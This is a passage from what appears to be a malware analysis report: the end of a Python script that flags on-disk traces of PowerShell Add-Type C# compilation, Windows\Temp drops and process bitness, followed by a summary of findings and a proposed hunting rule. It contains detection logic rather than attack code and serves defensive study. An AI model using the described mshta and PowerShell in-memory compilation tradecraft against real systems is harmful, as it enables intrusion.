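    sets = defaultdict(lambda: {"cmdline": False, "source": False, "dll": False,
                                "pdb": False, "csc_tmp": False})
    for raw in paths:
        p = normalize(raw)
        m = ADDTYPE_DIR_RE.search(p)
        if not m:
            continue
        dirname, fname = m.group(1), m.group(2)
        rec = sets[dirname]
        if fname == f"{dirname}.cmdline":
            rec["cmdline"] = True
        elif fname == f"{dirname}.0.cs":
            rec["source"] = True
        elif fname == f"{dirname}.dll":
            rec["dll"] = True
        elif fname == f"{dirname}.pdb":
            rec["pdb"] = True
        elif fname.startswith("csc") and fname.endswith(".tmp"):
            rec["csc_tmp"] = True
    return {d: r for d, r in sets.items() if r["cmdline"] and r["source"]}


def find_windows_temp_drops(paths):
    """Files written under C:\\Windows\\Temp that are not compiler artifacts."""
    return sorted(p for p in map(normalize, paths)
                  if p.startswith("c:\\windows\\temp\\") and not ADDTYPE_DIR_RE.search(p))


def count_cvtres_outputs(paths):
    return sum(1 for raw in paths if CVTRES_RE.search(normalize(raw)))


def process_address_width(paths):
    """Heuristic (assumption): a PID whose dumped regions all end below 4 GiB is treated as 32-bit."""
    high = {}
    for p in paths:
        m = MEMDUMP_RE.match(p)
        if m:
            pid, end = int(m.group(1)), int(m.group(4), 16)
            high[pid] = max(high.get(pid, 0), end)
    return {pid: (32 if end <= 0xFFFFFFFF else 64) for pid, end in high.items()}


def summarize(paths):
    comps = find_addtype_compilations(paths)
    return {
        "compilations": sorted(comps),
        "compiled_dlls": sorted(d for d, r in comps.items() if r["dll"]),
        "missing_pdb": sorted(d for d, r in comps.items() if not r["pdb"]),
        "windows_temp_drops": find_windows_temp_drops(paths),
        "pid_address_width": process_address_width(paths),
        "resource_tmp_files": count_cvtres_outputs(paths),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(REPORT_FILES), indent=2))
```

Run on this report's list it reports three Add-Type compilations, all of which produced a .dll (o0ad3aie without a .pdb), two Windows\Temp drops, three RES*.tmp resource files, and a 32-bit PID 3520 (consistent with the SysWOW64 mshta.exe parent) beside a 64-bit PID 952. The same grouping is usable as a hunting rule: a .cmdline plus .0.cs in a random Temp directory, created by powershell.exe and followed by csc.exe, is the on-disk footprint of in-memory C# compilation regardless of what the source does.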